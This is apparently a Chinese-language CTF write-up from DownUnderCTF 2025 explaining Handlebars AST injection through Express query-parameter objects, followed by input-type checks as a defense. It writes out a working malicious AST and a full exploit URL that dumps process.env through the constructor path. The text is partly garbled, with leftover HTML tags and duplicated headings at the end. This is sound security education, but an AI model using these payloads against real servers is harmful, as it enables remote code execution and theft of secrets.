Handlebars AST语法树注入分析与防御<\/h1>

前言<\/h2>
本文通过分析DownUnderCTF 2025中的一道题目，深入探讨Handlebars模板引擎中AST语法树注入的安全问题。题目使用了最新版本的Handlebars，不存在传统SSTI(服务器端模板注入)漏洞，而是通过AST语法树注入实现攻击。<\/p>

题目分析<\/h2>

初始环境<\/h3>

题目提供了一个简单的Dockerfile和app.js：<\/p>

\/\/ app.js
<\/span><\/span><\/span><\/span>const<\/span> express<\/span> =<\/span> require<\/span>('express'<\/span>);
<\/span><\/span>const<\/span> Handlebars<\/span> =<\/span> require<\/span>('handlebars'<\/span>);
<\/span><\/span>
<\/span><\/span>const<\/span> app<\/span> =<\/span> express<\/span>();
<\/span><\/span>
<\/span><\/span>app<\/span>.get<\/span>('\/'<\/span>, (req<\/span>, res<\/span>) => {
<\/span><\/span>    const<\/span> x<\/span> =<\/span> req<\/span>.query<\/span>.x<\/span>;
<\/span><\/span>    const<\/span> template<\/span> =<\/span> Handlebars<\/span>.compile<\/span>(x<\/span>);
<\/span><\/span>    res<\/span>.send<\/span>(template<\/span>({}));
<\/span><\/span>});
<\/span><\/span>
<\/span><\/span>app<\/span>.listen<\/span>(3000<\/span>);
<\/span><\/span><\/code><\/pre>关键点：<\/p>

直接使用用户输入的req.query.x<\/code>作为Handlebars.compile的参数<\/li>
Handlebars是最新版本，传统SSTI漏洞已修复<\/li>
<\/ul>
Handlebars编译机制分析<\/h2>
compile方法实现<\/h3>
Handlebars.compile不仅接受字符串作为输入，还可以接受类型为Program<\/code>的对象：<\/p>
\/\/ handlebars\/lin\/handlebars\/compiler\/compiler.js
<\/span><\/span><\/span><\/span>function<\/span> compile<\/span>(input<\/span>, options<\/span>) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    if<\/span> (input<\/span> &&<\/span> typeof<\/span> input<\/span> ===<\/span> 'object'<\/span> &&<\/span> input<\/span>.type<\/span> ===<\/span> 'Program'<\/span>) {
<\/span><\/span>        return<\/span> compileInput<\/span>(input<\/span>);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>AST解析过程<\/h3>

env.parse<\/code>生成AST语法树<\/li>
如果input.type<\/code>为Program<\/code>，直接返回整个对象，不做任何处理<\/li>
compileInput()<\/code>将其编译后交给env.template<\/code><\/li>
<\/ol>
关键点：<\/p>

当传入对象且type<\/code>为Program<\/code>时，Handlebars会直接使用该对象作为AST<\/li>
Express的查询参数解析会将x[params]=xxx<\/code>这样的语法解析为对象<\/li>
<\/ul>
恶意AST树构建<\/h2>
AST节点类型分析<\/h3>
Handlebars模板中的{{...}}<\/code>语法被称为"Mustache"表达式，会被处理为MustacheStatement<\/code>节点。<\/p>
示例测试代码：<\/p>
const<\/span> Handlebars<\/span> =<\/span> require<\/span>('handlebars'<\/span>);
<\/span><\/span>const<\/span> ast<\/span> =<\/span> Handlebars<\/span>.parse<\/span>('{{2}}'<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(ast<\/span>);
<\/span><\/span><\/code><\/pre>输出结果：<\/p>
{
<\/span><\/span>  "type"<\/span>: "Program"<\/span>,
<\/span><\/span>  "body"<\/span>: [
<\/span><\/span>    {
<\/span><\/span>      "type"<\/span>: "MustacheStatement"<\/span>,
<\/span><\/span>      "path"<\/span>: {
<\/span><\/span>        "type"<\/span>: "NumberLiteral"<\/span>,
<\/span><\/span>        "value"<\/span>: 2<\/span>
<\/span><\/span>      }
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Helper调用分析<\/h3>
当注册并调用helper时，AST结构会有所不同：<\/p>
Handlebars<\/span>.registerHelper<\/span>('test'<\/span>, function<\/span>() {});
<\/span><\/span>const<\/span> ast<\/span> =<\/span> Handlebars<\/span>.parse<\/span>('{{test 2}}'<\/span>);
<\/span><\/span>console<\/span>.log<\/span>(ast<\/span>);
<\/span><\/span><\/code><\/pre>输出结果：<\/p>
{
<\/span><\/span>  "type"<\/span>: "Program"<\/span>,
<\/span><\/span>  "body"<\/span>: [
<\/span><\/span>    {
<\/span><\/span>      "type"<\/span>: "MustacheStatement"<\/span>,
<\/span><\/span>      "path"<\/span>: {
<\/span><\/span>        "type"<\/span>: "PathExpression"<\/span>,
<\/span><\/span>        "parts"<\/span>: ["test"<\/span>]
<\/span><\/span>      },
<\/span><\/span>      "params"<\/span>: [
<\/span><\/span>        {
<\/span><\/span>          "type"<\/span>: "NumberLiteral"<\/span>,
<\/span><\/span>          "value"<\/span>: 2<\/span>
<\/span><\/span>        }
<\/span><\/span>      ]
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键区别：<\/p>

普通表达式：NumberLiteral<\/code>在path<\/code>中<\/li>
Helper调用：NumberLiteral<\/code>在params<\/code>中<\/li>
<\/ul>
参数处理机制<\/h3>
setupFullMustacheParams<\/code>方法处理参数节点：<\/p>
pushParams<\/span>(val<\/span>) {
<\/span><\/span>    this<\/span>.accept<\/span>(val<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>accept<\/code>方法根据节点类型调用对应的处理方法。对于NumberLiteral<\/code>：<\/p>
NumberLiteral<\/span>(number<\/span>) {
<\/span><\/span>    this<\/span>.opcode<\/span>('pushLiteral'<\/span>, number<\/span>.value<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

opcode<\/code>将value<\/code>字段中的JavaScript函数字符串作为字面量添加到操作码中<\/li>
操作码最终会被拼接生成JS代码并执行<\/li>
<\/ul>
恶意AST构造与利用<\/h2>
构造恶意AST<\/h3>
基于上述分析，可以构造如下恶意AST：<\/p>
{
<\/span><\/span>  "type"<\/span>: "Program"<\/span>,
<\/span><\/span>  "body"<\/span>: [
<\/span><\/span>    {
<\/span><\/span>      "type"<\/span>: "MustacheStatement"<\/span>,
<\/span><\/span>      "path"<\/span>: {
<\/span><\/span>        "type"<\/span>: "PathExpression"<\/span>,
<\/span><\/span>        "parts"<\/span>: ["constructor"<\/span>]
<\/span><\/span>      },
<\/span><\/span>      "params"<\/span>: [
<\/span><\/span>        {
<\/span><\/span>          "type"<\/span>: "StringLiteral"<\/span>,
<\/span><\/span>          "value"<\/span>: "console.log(process.env); return 'pwned'"<\/span>
<\/span><\/span>        }
<\/span><\/span>      ],
<\/span><\/span>      "hash"<\/span>: null<\/span>,
<\/span><\/span>      "escaped"<\/span>: false<\/span>
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/h3>
通过Express查询参数传递恶意AST对象：<\/p>
http:\/\/example.com\/?x[type]=Program&x[body][0][type]=MustacheStatement&x[body][0][path][type]=PathExpression&x[body][0][path][parts][0]=constructor&x[body][0][params][0][type]=StringLiteral&x[body][0][params][0][value]=console.log(process.env); return 'pwned'
<\/code><\/pre>
最小化恶意AST<\/h3>
恶意AST可以简化为：<\/p>
{
<\/span><\/span>  "type"<\/span>: "Program"<\/span>,
<\/span><\/span>  "body"<\/span>: [
<\/span><\/span>    {
<\/span><\/span>      "type"<\/span>: "MustacheStatement"<\/span>,
<\/span><\/span>      "path"<\/span>: {
<\/span><\/span>        "parts"<\/span>: ["constructor"<\/span>]
<\/span><\/span>      },
<\/span><\/span>      "params"<\/span>: [
<\/span><\/span>        {
<\/span><\/span>          "value"<\/span>: "console.log(process.env); return 'pwned'"<\/span>
<\/span><\/span>        }
<\/span><\/span>      ]
<\/span><\/span>    }
<\/span><\/span>  ]
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>防御措施<\/h2>


输入类型检查<\/strong>：<\/p>

在传入Handlebars.compile<\/code>前，检查req.query.x<\/code>的类型<\/li>
确保只接受字符串输入，拒绝对象类型<\/li>
<\/ul>
<\/li>

安全实践<\/strong>：<\/p>

避免直接使用用户可控输入作为模板<\/li>
提前准备并编译模板，最后使用template渲染数据<\/li>
<\/ul>
<\/li>

代码修改示例<\/strong>：<\/p>
<\/li>
<\/ol>
app<\/span>.get<\/span>('\/'<\/span>, (req<\/span>, res<\/span>) => {
<\/span><\/span>    const<\/span> x<\/span> =<\/span> req<\/span>.query<\/span>.x<\/span>;
<\/span><\/span>    if<\/span> (typeof<\/span> x<\/span> !==<\/span> 'string'<\/span>) {
<\/span><\/span>        return<\/span> res<\/span>.status<\/span>(400<\/span>).send<\/span>('Invalid input'<\/span>);
<\/span><\/span>    }
<\/span><\/span>    const<\/span> template<\/span> =<\/span> Handlebars<\/span>.compile<\/span>(x<\/span>);
<\/span><\/span>    res<\/span>.send<\/span>(template<\/span>({}));
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>总结<\/h2>
Handlebars的AST语法树注入漏洞源于：<\/p>

接受对象作为输入并直接解析为AST<\/li>
Express查询参数解析允许构造复杂对象<\/li>
AST编译过程中未对节点内容进行充分验证<\/li>
<\/ol>
防御关键在于严格控制输入类型和来源，避免用户直接控制模板编译过程。<\/p>

Handlebars AST语法树注入分析与防御<\/h1>

前言<\/h2> 本文通过分析DownUnderCTF 2025中的一道题目，深入探讨Handlebars模板引擎中AST语法树注入的安全问题。题目使用了最新版本的Handlebars，不存在传统SSTI(服务器端模板注入)漏洞，而是通过AST语法树注入实现攻击。<\/p>

题目分析<\/h2>

Handlebars编译机制分析<\/h2>

恶意AST树构建<\/h2>

恶意AST构造与利用<\/h2>

前言<\/h2>
本文通过分析DownUnderCTF 2025中的一道题目，深入探讨Handlebars模板引擎中AST语法树注入的安全问题。题目使用了最新版本的Handlebars，不存在传统SSTI(服务器端模板注入)漏洞，而是通过AST语法树注入实现攻击。<\/p>